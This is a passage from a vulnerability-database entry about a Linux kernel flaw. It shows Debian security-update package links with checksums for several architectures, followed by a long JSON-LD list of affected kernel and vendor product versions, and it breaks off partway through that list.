checksum: 370710 35281c3da9947c322b12a014adabbcad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23159310 22caa95faeb5687d37e677b4e34503b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 371066 9961d473b25000f7bb7a23bde2720323 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23557104 bd8ab7bd0594a795f34dac94ee24ffae

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 758022 786d9ca518b1a573caf38f5492104cc4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 238208 3155d20f0210f5fd9a2e27fc28165502 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 236574 05d74c2012431ee9bdae90e172a82de0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 237136 7950ba3ebfc31e3cf6536b34eccaf684 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7828888 56510e3515975d5ed979a55fb0bb14b7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 1633146 654e757be4670f764a99049c7984aa98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 3633806 0c911d5a677f4fdb22f44cf617cd8374 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7534830 da50ed9bfd6846d2ab2ced362b19ab4e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 7889984 06c9c7d89731808d7e376986cc472843 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 110394 68dd1fe380aa0c9ba6caa84f934569fd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 110416 c1d7fd64b9efab8228f305d5474de5d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 3598560 f63cbef687984b543d1152e013bc95fe

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14291528 b0e802720e53cb53650b8a2d75d1588d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 304718 aa3ebf9c5e7cde5fc11513c27b4396d0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 110370 d746af2e449aaf644370d7b88a03cf2d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14631258 b056f4f2245e4e2da6ef8e7549224226 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14611896 ad3108a56bbacf863b4f18521275887c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 800838 114ac1590a19b405fcacfb06ee36e55a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 3820700 fff1d7baf26f32217a8100ca14875708 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 110352 02deff17df2e96a0ed208d786bdf9315 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 3785870 518b0d1f9d0d13adce8d6707726031ab http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 302894 c9354f7c9769be34b6356e0d042a294e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 304918 228d8163856c2e8e261b0fd086475d68

These files will probably be moved into the stable distribution on its next update

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0593",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.2.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.3.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.4.z (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.29.rc2-git1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.24.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.23.17"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.2"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.1"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "intuity audix lx sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "intuity audix lx sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "linux enterprise sdk sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "esx server esx400-201005401",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.2"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "vma rhel5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "messaging storage server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "linux enterprise desktop sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "enterprise virtualization hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "esx server esx400-200909401",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "enterprise linux es 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux as 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "esx server esx400-200912403",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "meeting exchange sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "enterprise linux 5.3.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.0.52"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "esx server esx400-201003405",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "novell linux pos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "open-enterprise-server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "message networking sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.3"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
